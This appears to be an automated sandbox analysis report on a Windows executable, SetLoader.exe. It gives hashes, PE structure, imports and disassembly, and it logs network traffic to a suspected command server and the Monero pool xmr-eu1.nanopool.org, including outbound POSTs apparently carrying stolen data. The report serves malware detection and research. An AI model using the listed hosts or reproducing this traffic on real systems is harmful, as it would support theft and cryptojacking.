                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\ProgramData\PcHealthTool\HealthTool.exe
                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):14544
                                            Entropy (8bit):6.2660301556221185
                                            Encrypted:false
                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                            Malicious:true
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: 22.08.2024.exe, Detection: malicious
• Filename: 3QKcKCEzYP.exe, Detection: malicious
• Filename: ExeFile (375).exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: j0A1eprdwX.exe, Detection: malicious
• Filename: Q5PewRuhqV.exe, Detection: malicious
• Filename: fkABXcncEA.exe, Detection: malicious
• Filename: test2.exe, Detection: malicious
• Filename: test.exe, Detection: malicious
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.686854374264549
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:SetLoader.exe
                                            File size:15'458'400 bytes
                                            MD5:68adcb0c0e4419351ae5371732ea78dd
                                            SHA1:66817456a9339399d01b37ebb59bca59cbc7ec7d
                                            SHA256:695cb5d1f8e58dc1c894791b70adc5bd1b0401e6e0fcf55a82637796ec236d84
                                            SHA512:3a21c097c783fec05fae9c0186751d968ee937b0b39c0c43113d9c881f53189b3d189c7652594c43ac2d1b1c4759798a4b7dd19b48c0ca9a4ebf7cc3515608fe
                                            SSDEEP:196608:zde8u5aBaVSXEJYAKFQWJHyHCMqariuk2k+i8rYnGx9cN/MfA122MLdrp5OH:zde8e8aVSUOAAXJcCQ42kZPnYcNKLRe
                                            TLSH:CAF6339DE716B0AFC953663309D789A32DF95C312D17DC8A075399A80BA63C0BC614FE
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W...6...6...6....V..6....T.'6....U..6..)MZ..6..)M...6..)M...6..)M...6...N$..6...N4..6...6...7..'M...6..'M...6..'MX..6..'M...6.
                                            Icon Hash:7039191309091c1a
                                            Entrypoint:0x421d50
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x651BC7F7 [Tue Oct 3 07:51:19 2023 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:75e9596d74d063246ba6f3ac7c5369a0
                                            Instruction
                                            call 00007F31886027FBh
                                            jmp 00007F31886021ADh
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            push 00424F20h
                                            push dword ptr fs:[00000000h]
                                            mov eax, dword ptr [esp+10h]
                                            mov dword ptr [esp+10h], ebp
                                            lea ebp, dword ptr [esp+10h]
                                            sub esp, eax
                                            push ebx
                                            push esi
                                            push edi
                                            mov eax, dword ptr [0044277Ch]
                                            xor dword ptr [ebp-04h], eax
                                            xor eax, ebp
                                            push eax
                                            mov dword ptr [ebp-18h], esp
                                            push dword ptr [ebp-08h]
                                            mov eax, dword ptr [ebp-04h]
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            mov dword ptr [ebp-08h], eax
                                            lea eax, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], eax
                                            ret
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            mov ecx, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], ecx
                                            pop ecx
                                            pop edi
                                            pop edi
                                            pop esi
                                            pop ebx
                                            mov esp, ebp
                                            pop ebp
                                            push ecx
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 0Ch
                                            lea ecx, dword ptr [ebp-0Ch]
                                            call 00007F31885F48D1h
                                            push 0043F388h
                                            lea eax, dword ptr [ebp-0Ch]
                                            push eax
                                            call 00007F3188604D25h
                                            int3
                                            jmp 00007F3188606BF8h
                                            push ebp
                                            mov ebp, esp
                                            and dword ptr [00466078h], 00000000h
                                            sub esp, 24h
                                            or dword ptr [004427B0h], 01h
                                            push 0000000Ah
                                            call dword ptr [004361D0h]
                                            test eax, eax
                                            je 00007F31886024E2h
                                            and dword ptr [ebp-10h], 00000000h
                                            xor eax, eax
                                            push ebx
                                            push esi
                                            push edi
                                            xor ecx, ecx
                                            lea edi, dword ptr [ebp-24h]
                                            Programming Language:
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                             Name                                  | Virtual Address | Virtual Size | Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT          | 0x405c0         | 0x34         | .rdata
                                             IMAGE_DIRECTORY_ENTRY_IMPORT          | 0x405f4         | 0x50         | .rdata
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE        | 0x68000         | 0x8498       | .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION       | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_SECURITY        | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_BASERELOC       | 0x71000         | 0x255c       | .reloc
                                             IMAGE_DIRECTORY_ENTRY_DEBUG           | 0x3e3b0         | 0x54         | .rdata
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT       | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR       | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_TLS             | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     | 0x388b0         | 0x40         | .rdata
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_IAT             | 0x36000         | 0x278        | .rdata
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    | 0x3fa9c         | 0x120        | .rdata
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_RESERVED        | 0x0             | 0x0          |
                                             Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type                                           | Entropy            | Characteristics
                                             .text  | 0x1000          | 0x345cc      | 0x34600  | b7a8b04ab2248443b05e8133fb3a9064 | False    | 0.5887343377088305  | data                                                | 6.708390817791953  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                             .rdata | 0x36000         | 0xb410       | 0xb600   | a418919d63b67e937555eec95d3b6bcb | False    | 0.45409083104395603 | Applesoft BASIC program data, first line number 4  | 5.215945456388312  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .data  | 0x42000         | 0x24758      | 0x1200   | d8d5c95192b51ddad1857caa38e7daa9 | False    | 0.4049479166666667  | data                                                | 4.078919796039023  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                             .didat | 0x67000         | 0x1a4        | 0x200    | ee74a17c4eeb586c9811481b77498b43 | False    | 0.4609375           | data                                                | 3.5194570553957747 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                             .rsrc  | 0x68000         | 0x8498       | 0x8600   | 2217b820ffe0708c9de02a5171748b18 | False    | 0.4214960354477612  | data                                                | 5.218156641242916  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .reloc | 0x71000         | 0x255c       | 0x2600   | 699c6b2b1b2acad2d0f219d9328713af | False    | 0.783203125         | data                                                | 6.6660836278877325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                             Name          | RVA     | Size   | Type                                                                                           | Language | Country       | ZLIB Complexity
                                             PNG           | 0x68584 | 0xb45  | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced                                      | English  | United States | 1.0027729636048528
                                             PNG           | 0x690cc | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced                                     | English  | United States | 0.9363390441839495
                                             RT_ICON       | 0x6a678 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m  |          |               | 0.38386524822695034
                                             RT_ICON       | 0x6aae0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m  |          |               | 0.2075515947467167
                                             RT_ICON       | 0x6bb88 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m  |          |               | 0.1412863070539419
                                             RT_DIALOG     | 0x6e130 | 0x286  | data                                                                                           | English  | United States | 0.5092879256965944
                                             RT_DIALOG     | 0x6e3b8 | 0x13a  | data                                                                                           | English  | United States | 0.60828025477707
                                             RT_DIALOG     | 0x6e4f4 | 0xec   | data                                                                                           | English  | United States | 0.6991525423728814
                                             RT_DIALOG     | 0x6e5e0 | 0x12e  | data                                                                                           | English  | United States | 0.5927152317880795
                                             RT_DIALOG     | 0x6e710 | 0x338  | data                                                                                           | English  | United States | 0.45145631067961167
                                             RT_DIALOG     | 0x6ea48 | 0x252  | data                                                                                           | English  | United States | 0.5757575757575758
                                             RT_STRING     | 0x6ec9c | 0x1e2  | data                                                                                           | English  | United States | 0.3900414937759336
                                             RT_STRING     | 0x6ee80 | 0x1cc  | data                                                                                           | English  | United States | 0.4282608695652174
                                             RT_STRING     | 0x6f04c | 0x1b8  | data                                                                                           | English  | United States | 0.45681818181818185
                                             RT_STRING     | 0x6f204 | 0x146  | data                                                                                           | English  | United States | 0.5153374233128835
                                             RT_STRING     | 0x6f34c | 0x46c  | data                                                                                           | English  | United States | 0.3454063604240283
                                             RT_STRING     | 0x6f7b8 | 0x166  | data                                                                                           | English  | United States | 0.49162011173184356
                                             RT_STRING     | 0x6f920 | 0x152  | data                                                                                           | English  | United States | 0.5059171597633136
                                             RT_STRING     | 0x6fa74 | 0x10a  | data                                                                                           | English  | United States | 0.49624060150375937
                                             RT_STRING     | 0x6fb80 | 0xbc   | data                                                                                           | English  | United States | 0.6329787234042553
                                             RT_STRING     | 0x6fc3c | 0xd6   | data                                                                                           | English  | United States | 0.5747663551401869
                                             RT_GROUP_ICON | 0x6fd14 | 0x30   | data                                                                                           |          |               | 0.8125
                                             RT_MANIFEST   | 0x6fd44 | 0x753  | XML 1.0 document, ASCII text, with CRLF line terminators                                       | English  | United States | 0.39786666666666665
                                             DLL          | Import
                                             KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                             OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
                                             gdiplus.dll  | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                             Language of compilation system | Country where language is spoken | Map
                                             English                        | United States                    |
                                            Aug 25, 2024 15:44:04.591084003 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:04.591171026 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:04.591444969 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:04.591460943 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.057439089 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.057573080 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.058770895 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.058779955 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.059005976 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.059779882 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.059803963 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.059807062 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.389122009 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.389183998 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.389254093 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.389362097 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.389390945 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.389404058 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.389410019 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:45:00.571037054 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:00.576132059 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:00.576797962 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:00.577167034 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:00.582075119 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.183458090 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.183559895 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.183682919 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:01.222944021 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:01.227972031 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.393560886 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.445127010 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:01.524087906 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.572681904 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:01.626470089 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.678469896 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:11.701189041 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:11.756552935 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:21.797976017 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:21.850305080 CEST4974510343192.168.2.4146.59.154.106
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 25, 2024 15:43:55.383109093 CEST | 59721 | 53 | 192.168.2.4 | 1.1.1.1
Aug 25, 2024 15:43:55.409955025 CEST | 53 | 59721 | 1.1.1.1 | 192.168.2.4
Aug 25, 2024 15:45:00.556020021 CEST | 52160 | 53 | 192.168.2.4 | 1.1.1.1
Aug 25, 2024 15:45:00.565752029 CEST | 53 | 52160 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 25, 2024 15:43:55.383109093 CEST | 192.168.2.4 | 1.1.1.1 | 0x3997 | Standard query (0) | animoanimalestop.fun | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.556020021 CEST | 192.168.2.4 | 1.1.1.1 | 0xa567 | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 25, 2024 15:43:55.409955025 CEST | 1.1.1.1 | 192.168.2.4 | 0x3997 | No error (0) | animoanimalestop.fun | | 172.67.195.146 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:43:55.409955025 CEST | 1.1.1.1 | 192.168.2.4 | 0x3997 | No error (0) | animoanimalestop.fun | | 104.21.52.51 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 51.15.58.224 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 54.37.137.114 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 146.59.154.106 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 54.37.232.103 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 162.19.224.121 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 141.94.23.83 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 212.47.253.124 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 51.15.193.130 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 51.15.65.182 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 51.89.23.91 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:45:00.565752029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa567 | No error (0) | xmr-eu1.nanopool.org | | 163.172.154.142 | A (IP address) | IN (0x0001) | false
                                            • animoanimalestop.fun
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 172.67.195.146 | 443 | 5672 | C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-25 13:43:55 UTC | 339 | OUT | POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    Content-Length: 96
    Host: animoanimalestop.fun
2024-08-25 13:43:56 UTC | 664 | IN | HTTP/1.1 200 OK
    Date: Sun, 25 Aug 2024 13:43:56 GMT
    Transfer-Encoding: chunked
    Connection: close
    v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VcebaxIJjIXdtHeHATO9qSztLdeqTnmX3vMfA95x6Sx%2F2HESdPrVKAj2u6ySN7hqwze6iTZnXEBMlvAlOtPtB%2FNoehaDHsTvwtJZeMXxfKlnNKjH90810kXpe7%2FD2WZPnPAaTEp9UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8b8c038f2ad8439a-EWR
    alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 172.67.195.146 | 443 | 5672 | C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-25 13:43:56 UTC | 463 | OUT | POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
    Content-Length: 208
    Host: animoanimalestop.fun
2024-08-25 13:43:57 UTC | 644 | IN | HTTP/1.1 204 No Content
    Date: Sun, 25 Aug 2024 13:43:57 GMT
    Connection: close
    v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPD5h7PQ240%2BmRbwWdC3ALA0irBiuinESIrNPfK3y921vY2PCT2ay8XH5YEcbzWSZI2QkQaHmh%2FrHuC5YhjgikkBMgkmSzq2ceekRbu9a1WdflCIw0L1bKW3dWyyl0G5%2FKMtwBtttQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8b8c03953e214211-EWR
    alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 172.67.195.146 | 443 | 5672 | C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-25 13:43:59 UTC | 466 | OUT | POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
    Content-Length: 101666
    Host: animoanimalestop.fun
                                            2024-08-25 13:44:00 UTC648INHTTP/1.1 204 No Content
                                            Date: Sun, 25 Aug 2024 13:43:59 GMT
                                            Connection: close
                                            v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            CF-Cache-Status: DYNAMIC
